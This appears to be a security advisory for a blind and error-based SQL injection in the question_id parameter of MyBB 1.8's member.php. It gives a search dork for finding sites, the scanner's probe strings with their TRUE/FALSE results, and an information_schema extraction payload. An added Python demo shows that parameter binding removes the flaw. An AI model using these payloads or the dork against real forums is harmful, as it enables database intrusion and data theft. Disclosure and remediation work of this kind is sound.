
MyBB 1.8 SQL Injection Vulnerability

Author: indoushka, Published: 25-10-2014
Vendor : http://www.mybb.com/
Dork: Powered By MyBB
==========================

Blind SQL Injection :

SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating user input. It occurs when a web application places user input directly into a SQL statement without properly filtering out dangerous characters.

This is one of the most common application-layer attacks currently in use on the Internet. Although it is relatively easy to protect against, a large number of web applications remain vulnerable.
This vulnerability affects /mybb/member.php.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input question_id was set to GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz'/**/AND/**/'0006gfF'='0006gfF

Tests performed:
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 2+1-1-1=0+0+0+1 AND '0006gfF'='0006gfF => TRUE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3+1-1-1=0+0+0+1 AND '0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3*2<(0+5+0+0) AND '0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3*2>(0+5+0+0) AND '0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 2+1-1-1=1 AND '0006gfF'='0006gfF => TRUE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3+1-1-1=1 AND '0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3*2<5 AND '0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3*2>5 AND '0006gfF'='0006gfF => TRUE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz'/**/AND/**/0=1/**/AND/**/'0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz'/**/AND/**/'0006gfF'='0006gfF => TRUE

Original value: GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz
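
Added example, not part of the original advisory and not MyBB code: it replays six of the probes listed above against a string-concatenated query and against a bound-parameter query, showing why the TRUE/FALSE split indicates injection and that binding removes it. The table question_sessions, its columns and the helper names are assumptions, and SQLite stands in for the real database.

```python
import sqlite3

ORIGINAL = "GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz"  # "Original value" from the page

# Probe suffixes and results copied from the "Tests performed" list above.
PROBES = [
    ("' AND 2+1-1-1=1 AND '0006gfF'='0006gfF", True),
    ("' AND 3+1-1-1=1 AND '0006gfF'='0006gfF", False),
    ("' AND 3*2<5 AND '0006gfF'='0006gfF", False),
    ("' AND 3*2>5 AND '0006gfF'='0006gfF", True),
    ("'/**/AND/**/0=1/**/AND/**/'0006gfF'='0006gfF", False),
    ("'/**/AND/**/'0006gfF'='0006gfF", True),
]


def make_db():
    # Constructed schema: table and column names are assumptions, not MyBB's.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE question_sessions (sid TEXT PRIMARY KEY, qid INTEGER)")
    db.execute("INSERT INTO question_sessions VALUES (?, 1)", (ORIGINAL,))
    return db


def lookup_concat(db, question_id):
    # Vulnerable pattern: the input becomes part of the statement text.
    sql = "SELECT qid FROM question_sessions WHERE sid='" + question_id + "'"
    return db.execute(sql).fetchone() is not None


def lookup_bound(db, question_id):
    # Hardened pattern: the input is a bound value and is never parsed as SQL.
    sql = "SELECT qid FROM question_sessions WHERE sid=?"
    return db.execute(sql, (question_id,)).fetchone() is not None


def probe_results(lookup):
    """Run every probe through `lookup`; True means a row was returned."""
    db = make_db()
    return [lookup(db, ORIGINAL + suffix) for suffix, _ in PROBES]


def follows_injected_logic(lookup):
    """True when the responses track the injected conditions (injectable)."""
    return probe_results(lookup) == [expected for _, expected in PROBES]


if __name__ == "__main__":
    for name, fn in (("concatenated", lookup_concat), ("bound", lookup_bound)):
        print(name, probe_results(fn), "injectable:", follows_injected_logic(fn))
```

With the bound query every probe returns no row, so the response no longer depends on the injected condition; the same pair of functions can serve as a regression check after a fix.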

SQL Injection :

URL encoded POST input question_id was set to 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(116),CHAR(122),CHAR(52),CHAR(122),CHAR(109),CHAR(106),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
